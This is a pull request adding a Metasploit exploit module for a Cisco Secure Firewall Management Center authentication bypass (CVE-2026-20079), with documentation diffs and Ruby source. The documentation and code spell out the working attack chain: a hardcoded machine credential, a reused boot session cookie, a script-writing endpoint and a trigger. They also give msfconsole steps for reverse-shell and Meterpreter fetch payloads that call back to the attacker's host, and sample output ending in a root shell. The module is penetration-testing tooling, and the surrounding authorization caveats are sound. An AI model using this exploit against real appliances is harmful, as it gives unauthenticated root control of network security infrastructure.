### PR TITLE
Add Cisco Secure FMC CVE-2026-20079 auth bypass RCE module

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
@@ -127,7 +127,7 @@ server-side session.
 
 ## Verification Steps
 
-The module defaults to HTTPS on TCP port 443 and uses the `Unix Command` target.
+The module defaults to HTTPS on TCP port 443 and uses the `Unix/Linux Command` target.
 
 1. Obtain authorization for the FMC target, server-side session change, root command execution, callback, and evidence collection.
 2. Start `msfconsole`.
@@ -149,14 +149,43 @@ with addresses from the authorized test environment.
 
 ## Payload Guidance
 
-The target is `Unix Command` with architecture `ARCH_CMD`; the module does not assume a native CPU architecture.
+The target is `Unix/Linux Command` with architecture `ARCH_CMD`. It supports
+generic Unix command payloads and Linux command adapters without selecting a
+fixed native CPU architecture in the exploit module.
 
-The tested and recommended payload is `cmd/unix/reverse_netcat`. It uses the
-FIFO/netcat command family that was validated on Cisco Secure FMC `10.0.1-1` and requires a
-compatible `nc` binary plus outbound TCP connectivity to `LHOST:LPORT`. The
-module defaults that payload's `ShellPath` option to `/bin/sh -i`, matching the
-validated FIFO callback and requesting an interactive shell. The resulting
-command shell is still not a PTY, so terminal job control is unavailable.
+The `cmd/unix/reverse_netcat` payload uses the FIFO/netcat command family that
+was validated on Cisco Secure FMC `10.0.1-1`. It requires a compatible `nc`
+binary plus outbound TCP connectivity to `LHOST:LPORT`. The module defaults
+that payload's `ShellPath` option to `/bin/sh -i`, matching the validated FIFO
+callback and requesting an interactive shell. The resulting command shell is
+still not a PTY, so terminal job control is unavailable.
+
+The `cmd/linux/http/multi/meterpreter_reverse_tcp` payload has also been
+validated against a vulnerable FMC and opened a root Meterpreter session. It
+starts as an `ARCH_CMD` fetch command, reports the target architecture to the
+HTTP fetch handler, and receives the matching Linux Meterpreter binary. Dynamic
+multi-architecture delivery supports `CURL` and `WGET`; `CURL` is the default.
+The FMC must be able to reach `FETCH_SRVHOST:FETCH_SRVPORT` and the configured
+Meterpreter callback address. Select this payload explicitly because Framework
+may otherwise choose a different compatible command adapter. For example:
+
+```text
+set PAYLOAD cmd/linux/http/multi/meterpreter_reverse_tcp
+set FETCH_COMMAND CURL
+set FETCH_SRVHOST 192.0.2.20
+set FETCH_SRVPORT 8081
+set FETCH_WRITABLE_DIR /var/tmp
+set FETCH_DELETE true
+set LHOST 192.0.2.20
+set LPORT 4444
+```
+
+With the default `FETCH_FILELESS` value of `none`, the fetch payload writes a
+temporary executable. `FETCH_DELETE` defaults to `false`; the example enables
+it so the fetch command attempts to remove that executable after launch. Verify
+removal through an authorized method. The module's FileDropper registration
+covers `/var/tmp/license.tmp`, not a separate file created by the selected
+fetch payload.
 
 The generated Makeself script inserts the encoded command payload directly as
 POSIX shell source rather than placing it inside an additional quoted `sh -c`
@@ -165,7 +194,9 @@ literal backslash escapes, and other shell syntax emitted by Metasploit command
 payloads. Only JSON escapes representing actual script newlines are rewritten
 as `\u000A` for FMC wire compatibility.
 
-No native executable dropper or Meterpreter target is provided because no CPU architecture was established through authorized testing.
+The module does not add a separate native executable target. Fetch multi
+selects the Linux architecture during payload delivery while the exploit target
+remains `ARCH_CMD`.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
@@ -113,6 +113,9 @@ The exploit writes `/var/tmp/license.tmp`. The generated script removes that
 file before running the command payload and installs exit and signal cleanup
 handlers. Some command payloads, including `cmd/unix/reverse_netcat`, create
 their own randomized temporary FIFO and remove it when the payload exits.
+The module also registers `/var/tmp/license.tmp` with the Framework's FileDropper
+mixin after the file-write response is confirmed. If a session opens,
+FileDropper makes an additional cleanup attempt through that session.
 
 If the file-write response is missing or unexpected, the module refuses to
 trigger execution and warns that `/var/tmp/license.tmp` may require authorized
@@ -143,24 +146,6 @@ The module defaults to HTTPS on TCP port 443 and uses the `Unix Command` target.
 
 The addresses above are RFC 5737 documentation addresses and must be replaced
 with addresses from the authorized test environment.
-
-## Options
-
-### TIMEOUT
-
-The HTTP request timeout in seconds. The default is `15`. A timeout during the
-final trigger can be expected and is not treated as proof of failure or success.
-
-### AutoCheck
-
-Run the bounded GET-only authentication differential automatically before exploitation. The default is `true`.
-
-### ForceExploit
-
-Override a `Safe` or `Unknown` check result. This is usually unnecessary when
-FMC product markers are detected because `Detected` and `Appears` both permit
-exploitation. Use this only after independently confirming that the configured
-host is the authorized FMC target.
 
 ## Payload Guidance
 

--- a/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
@@ -1,0 +1,243 @@
+## Vulnerable Application
+
+CVE-2026-20079 is an authentication bypass in the web interface of on-premises
+Cisco Secure Firewall Management Center (FMC). An unauthenticated remote
+attacker can reuse a boot-created machine session, upgrade it using a hardcoded
+machine credential, and reach CGI functions that write and execute a shell
+script as root.
+
+The underlying request sequence and FIFO/netcat payload were manually validated
+against Cisco Secure FMC `10.0.1-1` before this module was implemented. The
+Metasploit module was subsequently validated against the same release: it
+opened a command shell, `id` reported `uid=0(root)`, and the temporary exploit
+script was confirmed absent after execution. Cisco first disclosed the
+vulnerability on March 4, 2026.
+
+The required `csm_processes` startup session is transient. Normal authenticated
+activity and session cleanup may remove it. Consequently, an affected release
+may not be exploitable at the time of testing. Do not reboot a production FMC
+solely to recreate the prerequisite.
+
+Use this module only against systems you own or have explicit written
+authorization to test. Exploitation changes server-side session state and
+executes the selected payload as root.
+
+### Affected Releases and Fixed Software
+
+Cisco lists affected and fixed software in the [Cisco advisory][cisco-advisory].
+At the time of publication, Cisco identified the following FMC release trains
+and hotfixes. Consult the advisory for the latest information before testing or
+remediation.
+
+| Release | Fixed hotfix |
+| ------- | ------------ |
+| 7.0 | `Cisco_Firepower_Mgmt_Center_Hotfix_GB-7.0.9.1-3.sh.REL.tar` |
+| 7.2 | `Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.11.1-4.sh.REL.tar` |
+| 7.4 | `Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.7.1-3.sh.REL.tar` |
+| 7.6 | `Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.5.1-2.sh.REL.tar` |
+| 7.7 | `Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.12.1-2.sh.REL.tar` |
+| 10.0 | `Cisco_Secure_FW_Mgmt_Center_Hotfix_P-10.0.1.1-2.sh.REL.tar` |
+
+The tested version, `10.0.1-1`, is not asserted to be the only affected
+version. Cisco also identifies Cisco Security Cloud Control Firewall Management
+as affected and states that its SaaS remediation has been deployed; this module
+targets on-premises FMC only.
+
+## Technical Details
+
+The module performs the following sequence:
+
+1. Supplies `CGISESSID=csm_processes` to `/login.cgi?logon=Continue` with the `report:snortrules` machine credential.
+2. Requires the expected HTTP 302 response from the session upgrade.
+3. Requests `/ui/user/general` and extracts the session-specific `sf_action_id`.
+4. Serializes a Makeself-compatible shell script as JSON, encoding newlines as
+   `\u000A`, and passes it to `validateLicense` through
+   `/sajaxintf.cgi?rs=callServerFunc`.
+5. Requires HTTP 200 and the expected `License is Invalid` response before continuing.
+6. Passes `/var/tmp/license.tmp` to
+   `SF::UI::DataObjectLibrary::upgradeReadinessCall` through `/pjb.cgi`. If the
+   server returns a response, the module requires HTTP 200.
+7. Waits for the selected Metasploit payload to create a session.
+
+A trigger timeout or connection close can occur while the payload retains the
+execution path and is therefore treated as ambiguous. An explicit non-200
+trigger response is rejected. Conversely, HTTP 200 from the trigger does not
+prove command execution. A new Metasploit session is the execution oracle.
+
+## Check Behavior
+
+The `check` method is intentionally non-invasive. It performs unauthenticated
+GET requests only and never supplies the exploit cookie or machine credential.
+
+It first requests `/` without automatic redirect following. A direct successful
+response must contain Cisco Secure FMC product markers. If the response
+redirects, the module follows only one redirect that:
+
+- remains on the original scheme, host, and port;
+- has the exact path `/ui/login`;
+- has no URL credentials, query, or fragment; and
+- returns a successful response containing either the full Cisco Secure FMC
+  branding or the paired Cisco icon and literal `Management Center` text.
+
+When FMC product markers are confirmed, `check` returns `Detected` because it
+cannot safely establish the installed patch state or presence of the transient
+startup session. It does not return `Appears` or `Vulnerable`. Metasploit's
+`AutoCheck` permits exploitation after `Detected` while warning that
+vulnerability was not validated.
+
+## Side Effects and Cleanup
+
+Exploitation upgrades the boot-created server-side `csm_processes` session. No
+vendor-documented downgrade operation is known. Clearing the client cookie does
+not undo this server-side change. Logging out, expiring, or deleting the session
+is not equivalent to restoring its prior partial state, so the module does not
+attempt those operations.
+
+The exploit writes `/var/tmp/license.tmp`. The generated script removes that
+file before running the command payload and installs exit and signal cleanup
+handlers. Some command payloads, including `cmd/unix/reverse_netcat`, create
+their own randomized temporary FIFO and remove it when the payload exits.
+
+If the file-write response is missing or unexpected, the module refuses to
+trigger execution and warns that `/var/tmp/license.tmp` may require authorized
+manual review. Cleanup of the temporary script does not restore the upgraded
+server-side session.
+
+## Verification Steps
+
+The module defaults to HTTPS on TCP port 443 and uses the `Unix Command` target.
+
+1. Obtain authorization for the FMC target, server-side session change, root command execution, callback, and evidence collection.
+2. Start `msfconsole`.
+3. Run `use exploit/linux/http/cisco_fmc_auth_bypass_rce`.
+4. Run `set RHOSTS 192.0.2.10`.
+5. Run `set RPORT 443`.
+6. Run `set SSL true`.
+7. Run `set PAYLOAD cmd/unix/reverse_netcat`.
+8. Run `set LHOST 192.0.2.20`.
+9. Run `set LPORT 4444`.
+10. Run `check` and confirm that it performs product detection only.
+11. Run `run` while the authorized FMC is in the required startup-session state.
+12. Confirm that a command shell session opens and run `id` to verify `uid=0(root)`.
+13. After the payload exits, verify through an authorized administrative method
+    that `/var/tmp/license.tmp` and the payload's temporary FIFO are absent.
+
+The addresses above are RFC 5737 documentation addresses and must be replaced
+with addresses from the authorized test environment.
+
+## Options
+
+### TIMEOUT
+
+The HTTP request timeout in seconds. The default is `15`. A timeout during the
+final trigger can be expected and is not treated as proof of failure or success.
+
+### AutoCheck
+
+Run the non-invasive product check automatically before exploitation. The default is `true`.
+
+### ForceExploit
+
+Override a `Safe` or `Unknown` check result. This is usually unnecessary when
+FMC product markers are detected because `Detected` already permits exploitation. Use
+this only after independently confirming that the configured host is the
+authorized FMC target.
+
+## Payload Guidance
+
+The target is `Unix Command` with architecture `ARCH_CMD`; the module does not assume a native CPU architecture.
+
+The default payload is `cmd/unix/reverse_netcat`. It uses the FIFO/netcat command
+family that was validated on Cisco Secure FMC `10.0.1-1` and requires a
+compatible `nc` binary plus outbound TCP connectivity to `LHOST:LPORT`. The
+module defaults that payload's `ShellPath` option to `/bin/sh -i`, matching the
+validated FIFO callback and requesting an interactive shell. The resulting
+command shell is still not a PTY, so terminal job control is unavailable.
+
+The generated Makeself script inserts the encoded command payload directly as
+POSIX shell source rather than placing it inside an additional quoted `sh -c`
+argument. This preserves quotes, substitutions, redirects, pipes, semicolons,
+literal backslash escapes, and other shell syntax emitted by Metasploit command
+payloads. Only JSON escapes representing actual script newlines are rewritten
+as `\u000A` for FMC wire compatibility.
+
+No native executable dropper or Meterpreter target is provided because no CPU architecture was established through authorized testing.
+
+## Scenarios
+
+### Authorized Cisco Secure FMC 10.0.1-1 validation
+
+The following is sanitized output from an authorized test against Cisco Secure
+FMC `10.0.1-1`. Addresses and the hostname were replaced with RFC 5737 and
+reserved example values, and nonessential lines were omitted.
+
+```text
+msf exploit(linux/http/cisco_fmc_auth_bypass_rce) > check
+[*] 192.0.2.10:443 - The service is running, but could not be validated. Cisco Secure Firewall Management Center product markers were found at the same-origin /ui/login path; vulnerability was not tested
+msf exploit(linux/http/cisco_fmc_auth_bypass_rce) > run
+[*] Started reverse TCP handler on 192.0.2.20:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Cisco Secure Firewall Management Center product markers were found at the same-origin /ui/login path; vulnerability was not tested
+[*] Upgrading the boot-created csm_processes session
+[*] Retrieving the session-specific sf_action_id
+[+] Obtained a valid session-specific sf_action_id
+[*] Writing the Makeself-compatible payload to /var/tmp/license.tmp
+[+] The target returned the expected validateLicense file-write response
+[*] Triggering the payload through upgradeReadinessCall
+[*] Command shell session 1 opened (192.0.2.20:4444 -> 192.0.2.10:<ephemeral>)
+msf exploit(linux/http/cisco_fmc_auth_bypass_rce) > sessions -i 1
+[*] Starting interaction with 1...
+sh-5.1# id
+uid=0(root) gid=0(root)
+sh-5.1# hostname
+fmc.example.test
+sh-5.1# test ! -e /var/tmp/license.tmp && echo LICENSE_TMP_ABSENT || echo LICENSE_TMP_PRESENT
+LICENSE_TMP_ABSENT
+```
+
+The shell is an interactive `/bin/sh` over a pipe, not a PTY. Messages about
+terminal process groups or unavailable job control are expected and do not
+indicate that command execution failed.
+
+Use the following commands to capture the module metadata, options, non-invasive check, and exploitation workflow:
+
+```text
+use exploit/linux/http/cisco_fmc_auth_bypass_rce
+info
+show options
+set RHOSTS 192.0.2.10
+set RPORT 443
+set SSL true
+set LHOST 192.0.2.20
+set LPORT 4444
+set PAYLOAD cmd/unix/reverse_netcat
+check
+run
+sessions -l
+sessions -i -1
+id
+hostname
+exit
+```
+
+Before publishing any additional evidence, sanitize the hostname and all
+addresses, cookies, action tokens, and other environment-specific values. Do
+not include full `sf_action_id` values or the `CGISESSID` cookie in public
+evidence.
+
+## References
+
+- [Cisco Security Advisory][cisco-advisory]
+- [VulnCheck technical analysis](https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079)
+- [CyberAuth Python PoC](https://github.com/CyberAuth/CVE-2026-20079)
+- [Banks.tools authorized reproduction write-up](https://banks.tools/writeups/cve-2026-20079-cisco-secure-fmc)
+
+## Attribution
+
+- Brandon Sakai of Cisco discovered the vulnerability during internal security testing.
+- Cale Black of VulnCheck published the documented exploit-chain research.
+- Arian Eidizadeh of CyberAuth independently reproduced the public exploit
+  chain, created the standalone Python PoC, and implemented this Metasploit
+  module.
+
+[cisco-advisory]: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2

--- a/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
@@ -69,9 +69,9 @@ prove command execution. A new Metasploit session is the execution oracle.
 The `check` method is intentionally non-invasive. It performs unauthenticated
 GET requests only and never supplies the exploit cookie or machine credential.
 
-It first requests `/` without automatic redirect following. A direct successful
-response must contain Cisco Secure FMC product markers. If the response
-redirects, the module follows only one redirect that:
+It first requests `/` without automatic redirect following and checks the
+response body for Cisco Secure FMC product markers. If the body has no markers
+and the response redirects, the module follows only one redirect that:
 
 - remains on the original scheme, host, and port;
 - has the exact path `/ui/login`;
@@ -180,7 +180,7 @@ msf exploit(linux/http/cisco_fmc_auth_bypass_rce) > run
 [!] The service is running, but could not be validated. Cisco Secure Firewall Management Center product markers were found at the same-origin /ui/login path; vulnerability was not tested
 [*] Upgrading the boot-created csm_processes session
 [*] Retrieving the session-specific sf_action_id
-[+] Obtained a valid session-specific sf_action_id
+[+] Obtained a valid session-specific sf_action_id: <redacted>
 [*] Writing the Makeself-compatible payload to /var/tmp/license.tmp
 [+] The target returned the expected validateLicense file-write response
 [*] Triggering the payload through upgradeReadinessCall

--- a/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_fmc_auth_bypass_rce.md
@@ -49,7 +49,8 @@ The module performs the following sequence:
 
 1. Supplies `CGISESSID=csm_processes` to `/login.cgi?logon=Continue` with the `report:snortrules` machine credential.
 2. Requires the expected HTTP 302 response from the session upgrade.
-3. Requests `/ui/user/general` and extracts the session-specific `sf_action_id`.
+3. Requests `/ui/user/general`, extracts the session-specific `sf_action_id`,
+   and rejects the all-zero placeholder value.
 4. Serializes a Makeself-compatible shell script as JSON, encoding newlines as
    `\u000A`, and passes it to `validateLicense` through
    `/sajaxintf.cgi?rs=callServerFunc`.
@@ -66,24 +67,39 @@ prove command execution. A new Metasploit session is the execution oracle.
 
 ## Check Behavior
 
-The `check` method is intentionally non-invasive. It performs unauthenticated
-GET requests only and never supplies the exploit cookie or machine credential.
+The `check` method performs a bounded, GET-only authentication differential. It
+does not submit the machine credential, upgrade the server-side session, obtain
+an action token, write a file, or execute a command.
 
-It first requests `/` without automatic redirect following and checks the
-response body for Cisco Secure FMC product markers. If the body has no markers
-and the response redirects, the module follows only one redirect that:
+It first requests `/` without automatic redirect following. If the response
+does not contain reliable Cisco Secure FMC product markers, the module follows
+only one redirect that:
 
 - remains on the original scheme, host, and port;
 - has the exact path `/ui/login`;
 - has no URL credentials, query, or fragment; and
-- returns a successful response containing either the full Cisco Secure FMC
-  branding or the paired Cisco icon and literal `Management Center` text.
+- returns a successful response containing both the Cisco icon path and the
+  structured `deviceLabel` value for `Management Center`.
 
-When FMC product markers are confirmed, `check` returns `Detected` because it
-cannot safely establish the installed patch state or presence of the transient
-startup session. It does not return `Appears` or `Vulnerable`. Metasploit's
-`AutoCheck` permits exploitation after `Detected` while warning that
-vulnerability was not validated.
+After identifying FMC, the module requests `/help/about.cgi` without a cookie.
+It sends `CGISESSID=csm_processes` to that same endpoint only when the control
+request returns HTTP 302 with the exact `Invalid session ID` response. The
+module returns `Appears` only when the fixed session returns HTTP 200 with the
+full Cisco Secure FMC product name and the case-sensitive `Model`, `OS`, and
+`Hostname` about-page markers. This establishes a low-impact authentication
+differential, but it does not test command execution or root access. A generic
+or client-rendered login application shell does not satisfy this condition.
+
+If FMC is identified but the transient session is unavailable, the control
+response differs, or the protected response cannot be validated, `check`
+returns `Detected` rather than `Safe`. A missing startup session does not prove
+that the installed release is patched. Metasploit's `AutoCheck` permits
+exploitation after either `Detected` or `Appears`.
+
+The check does not alter the session through the known upgrade request.
+However, the cookie-bearing GET may be recorded in appliance logs or affect
+ordinary session access metadata. It does not restore a previously upgraded
+session to its earlier partial state.
 
 ## Side Effects and Cleanup
 
@@ -100,7 +116,10 @@ their own randomized temporary FIFO and remove it when the payload exits.
 
 If the file-write response is missing or unexpected, the module refuses to
 trigger execution and warns that `/var/tmp/license.tmp` may require authorized
-manual review. Cleanup of the temporary script does not restore the upgraded
+manual review. If the file-write succeeds but the trigger times out, the
+connection closes, or the trigger returns a non-200 response, the module warns
+that cleanup is unverified and that the file may require authorized manual
+removal. Cleanup of the temporary script does not restore the upgraded
 server-side session.
 
 ## Verification Steps
@@ -116,7 +135,7 @@ The module defaults to HTTPS on TCP port 443 and uses the `Unix Command` target.
 7. Run `set PAYLOAD cmd/unix/reverse_netcat`.
 8. Run `set LHOST 192.0.2.20`.
 9. Run `set LPORT 4444`.
-10. Run `check` and confirm that it performs product detection only.
+10. Run `check` and confirm that it performs the bounded GET-only authentication differential.
 11. Run `run` while the authorized FMC is in the required startup-session state.
 12. Confirm that a command shell session opens and run `id` to verify `uid=0(root)`.
 13. After the payload exits, verify through an authorized administrative method
@@ -134,21 +153,21 @@ final trigger can be expected and is not treated as proof of failure or success.
 
 ### AutoCheck
 
-Run the non-invasive product check automatically before exploitation. The default is `true`.
+Run the bounded GET-only authentication differential automatically before exploitation. The default is `true`.
 
 ### ForceExploit
 
 Override a `Safe` or `Unknown` check result. This is usually unnecessary when
-FMC product markers are detected because `Detected` already permits exploitation. Use
-this only after independently confirming that the configured host is the
-authorized FMC target.
+FMC product markers are detected because `Detected` and `Appears` both permit
+exploitation. Use this only after independently confirming that the configured
+host is the authorized FMC target.
 
 ## Payload Guidance
 
 The target is `Unix Command` with architecture `ARCH_CMD`; the module does not assume a native CPU architecture.
 
-The default payload is `cmd/unix/reverse_netcat`. It uses the FIFO/netcat command
-family that was validated on Cisco Secure FMC `10.0.1-1` and requires a
+The tested and recommended payload is `cmd/unix/reverse_netcat`. It uses the
+FIFO/netcat command family that was validated on Cisco Secure FMC `10.0.1-1` and requires a
 compatible `nc` binary plus outbound TCP connectivity to `LHOST:LPORT`. The
 module defaults that payload's `ShellPath` option to `/bin/sh -i`, matching the
 validated FIFO callback and requesting an interactive shell. The resulting
@@ -173,11 +192,9 @@ reserved example values, and nonessential lines were omitted.
 
 ```text
 msf exploit(linux/http/cisco_fmc_auth_bypass_rce) > check
-[*] 192.0.2.10:443 - The service is running, but could not be validated. Cisco Secure Firewall Management Center product markers were found at the same-origin /ui/login path; vulnerability was not tested
+[*] 192.0.2.10:443 - The service is running, but could not be validated. Cisco Secure FMC was identified, but csm_processes did not return the expected protected content; the transient session may be unavailable or in a different state
 msf exploit(linux/http/cisco_fmc_auth_bypass_rce) > run
 [*] Started reverse TCP handler on 192.0.2.20:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[!] The service is running, but could not be validated. Cisco Secure Firewall Management Center product markers were found at the same-origin /ui/login path; vulnerability was not tested
 [*] Upgrading the boot-created csm_processes session
 [*] Retrieving the session-specific sf_action_id
 [+] Obtained a valid session-specific sf_action_id: <redacted>
@@ -195,11 +212,17 @@ sh-5.1# test ! -e /var/tmp/license.tmp && echo LICENSE_TMP_ABSENT || echo LICENS
 LICENSE_TMP_ABSENT
 ```
 
+The `Detected` result above was captured during follow-up validation. It shows
+that the module identified FMC but did not claim that the vulnerability appears
+exploitable when the transient session failed the strict protected-content
+test. Check results can differ when the session is pristine, already upgraded,
+absent, or otherwise unavailable.
+
 The shell is an interactive `/bin/sh` over a pipe, not a PTY. Messages about
 terminal process groups or unavailable job control are expected and do not
 indicate that command execution failed.
 
-Use the following commands to capture the module metadata, options, non-invasive check, and exploitation workflow:
+Use the following commands to capture the module metadata, options, bounded check, and exploitation workflow:
 
 ```text
 use exploit/linux/http/cisco_fmc_auth_bypass_rce

--- a/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
@@ -15,6 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
   TEMPORARY_SCRIPT = '/var/tmp/license.tmp'
   MAX_FINGERPRINT_BYTES = 512 * 1024
   ACTION_ID_REGEX = /var\s+sf_action_id\s*=\s*["']([0-9a-fA-F]{32})["']/
+  FMC_DEVICE_LABEL_REGEX = /"deviceLabel"\s*:\s*"Management Center"/
+  FMC_ABOUT_MARKERS = ['Cisco Secure Firewall Management Center', 'Model', 'OS', 'Hostname'].freeze
 
   def initialize(info = {})
     super(
@@ -57,7 +59,6 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_netcat',
                 'ShellPath' => '/bin/sh -i'
               }
             }
@@ -92,39 +93,39 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('The target did not respond to the root request') unless root_response
 
     if fmc_detected?(root_response.body)
-      return CheckCode::Detected(
-        'Cisco Secure Firewall Management Center product markers were found in the root response; vulnerability was not tested'
+      fingerprint_source = 'root response'
+    else
+      location = root_response.headers['Location']
+      unless root_response.redirect? && location && !location.empty?
+        return CheckCode::Unknown('The root response did not reliably identify Cisco Secure FMC')
+      end
+
+      login_uri = validated_login_redirect(location)
+      return CheckCode::Unknown('The root response redirected to an unexpected or unsafe location') unless login_uri
+
+      login_response = send_request_cgi(
+        {
+          'method' => 'GET',
+          'uri' => login_uri
+        },
+        datastore['TIMEOUT']
       )
+      return CheckCode::Unknown('The same-origin Cisco Secure FMC login path did not respond') unless login_response
+
+      unless login_response.code.between?(200, 299)
+        return CheckCode::Unknown("The same-origin Cisco Secure FMC login path returned HTTP #{login_response.code}")
+      end
+
+      unless fmc_detected?(login_response.body)
+        return CheckCode::Unknown(
+          'The same-origin /ui/login path did not contain reliable Cisco Secure FMC product markers'
+        )
+      end
+
+      fingerprint_source = 'same-origin /ui/login response'
     end
 
-    location = root_response.headers['Location']
-    unless root_response.redirect? && location && !location.empty?
-      return CheckCode::Safe('The root response did not identify Cisco Secure Firewall Management Center')
-    end
-
-    login_uri = validated_login_redirect(location)
-    return CheckCode::Safe('The root response redirected to an unexpected or unsafe location') unless login_uri
-
-    login_response = send_request_cgi(
-      {
-        'method' => 'GET',
-        'uri' => login_uri
-      },
-      datastore['TIMEOUT']
-    )
-    return CheckCode::Unknown('The same-origin Cisco Secure FMC login path did not respond') unless login_response
-
-    unless login_response.code.between?(200, 299)
-      return CheckCode::Safe("The Cisco Secure FMC login path returned HTTP #{login_response.code}")
-    end
-
-    if fmc_detected?(login_response.body)
-      return CheckCode::Detected(
-        'Cisco Secure Firewall Management Center product markers were found at the same-origin /ui/login path; vulnerability was not tested'
-      )
-    end
-
-    CheckCode::Unknown('The same-origin /ui/login path was present, but Cisco Secure Firewall Management Center product markers were not found')
+    check_authentication_bypass(fingerprint_source)
   rescue ::URI::Error => e
     CheckCode::Unknown("The login redirect could not be parsed: #{e.message}")
   end
@@ -141,11 +142,72 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def fmc_detected?(body)
-    bounded_body = body.to_s.byteslice(0, MAX_FINGERPRINT_BYTES).to_s.downcase
-    return true if bounded_body.include?('secure firewall management center')
+    body = bounded_response_body(body)
 
-    bounded_body.include?('/img/cisco-icon.svg') &&
-      bounded_body.match?(/\bmanagement\s+center\b/)
+    body.include?('/img/cisco-icon.svg') && body.match?(FMC_DEVICE_LABEL_REGEX)
+  end
+
+  def check_authentication_bypass(fingerprint_source)
+    control_response = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => '/help/about.cgi'
+      },
+      datastore['TIMEOUT']
+    )
+
+    unless control_response
+      return CheckCode::Detected(
+        "Cisco Secure FMC markers were found in the #{fingerprint_source}, " \
+        'but the unauthenticated about-page control did not respond'
+      )
+    end
+
+    unless control_response.code == 302 && bounded_response_body(control_response.body).include?('Invalid session ID')
+      return CheckCode::Detected(
+        "Cisco Secure FMC markers were found in the #{fingerprint_source}, " \
+        'but the unauthenticated about-page control did not match'
+      )
+    end
+
+    session_response = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => '/help/about.cgi',
+        'cookie' => session_cookie
+      },
+      datastore['TIMEOUT']
+    )
+
+    unless session_response
+      return CheckCode::Detected(
+        'Cisco Secure FMC was identified, but the transient csm_processes session did not respond'
+      )
+    end
+
+    if protected_fmc_response?(session_response)
+      CheckCode::Appears(
+        'Cisco Secure FMC rejected the unauthenticated about-page request but accepted csm_processes and returned ' \
+        'protected about-page markers; command execution was not tested'
+      )
+    else
+      CheckCode::Detected(
+        'Cisco Secure FMC was identified, but csm_processes did not return the expected protected content; ' \
+        'the transient session may be unavailable or in a different state'
+      )
+    end
+  end
+
+  def protected_fmc_response?(response)
+    return false unless response.code == 200
+    return false unless response.headers['Content-Type'].to_s.downcase.include?('text/html')
+
+    body = bounded_response_body(response.body)
+    FMC_ABOUT_MARKERS.all? { |marker| body.include?(marker) }
+  end
+
+  def bounded_response_body(body)
+    body.to_s.byteslice(0, MAX_FINGERPRINT_BYTES).to_s
   end
 
   def validated_login_redirect(location)
@@ -226,7 +288,14 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, failure_message)
     end
 
-    match[1].downcase
+    action_id = match[1].downcase
+    if action_id == ('0' * 32)
+      failure_message = 'The authenticated page returned the all-zero sf_action_id placeholder; ' \
+                        'the authentication bypass was not confirmed'
+      fail_with(Failure::NoAccess, failure_message)
+    end
+
+    action_id
   end
 
   def build_makeself_script(command)
@@ -315,6 +384,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless response
       print_warning(
+        "Cleanup of #{TEMPORARY_SCRIPT} is unverified because the trigger did not return; " \
+        'the file may require authorized manual removal.'
+      )
+      print_warning(
         'The trigger request timed out or the connection closed after submission. ' \
         'This can be expected; only a new Metasploit session confirms command execution.'
       )
@@ -322,6 +395,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     unless response.code == 200
+      print_warning(
+        "Cleanup of #{TEMPORARY_SCRIPT} is unverified because the trigger returned an unexpected response; " \
+        'the file may require authorized manual removal.'
+      )
       failure_message = "The trigger returned HTTP #{response.code} instead of the expected HTTP 200; " \
                         'no command execution was confirmed'
       fail_with(Failure::UnexpectedReply, failure_message)

--- a/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
+++ b/modules/exploits/linux/http/cisco_fmc_auth_bypass_rce.rb
@@ -1,0 +1,344 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  STATIC_SESSION = 'csm_processes'
+  MACHINE_USERNAME = 'report'
+  MACHINE_PASSWORD = 'snortrules'
+  TEMPORARY_SCRIPT = '/var/tmp/license.tmp'
+  MAX_FINGERPRINT_BYTES = 512 * 1024
+  ACTION_ID_REGEX = /var\s+sf_action_id\s*=\s*["']([0-9a-fA-F]{32})["']/
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco Secure Firewall Management Center Authentication Bypass RCE',
+        'Description' => %q{
+          This module exploits CVE-2026-20079, an authentication bypass in the
+          web interface of Cisco Secure Firewall Management Center (FMC). It
+          upgrades a boot-created machine session, obtains its session-specific
+          action token, writes a Makeself-compatible shell script, and executes
+          the selected command payload as root.
+
+          Exploitation requires the transient csm_processes startup session to
+          still exist. Normal authenticated activity or session cleanup may
+          remove that session, so an affected appliance may not be exploitable
+          at the time of testing. The underlying request sequence and
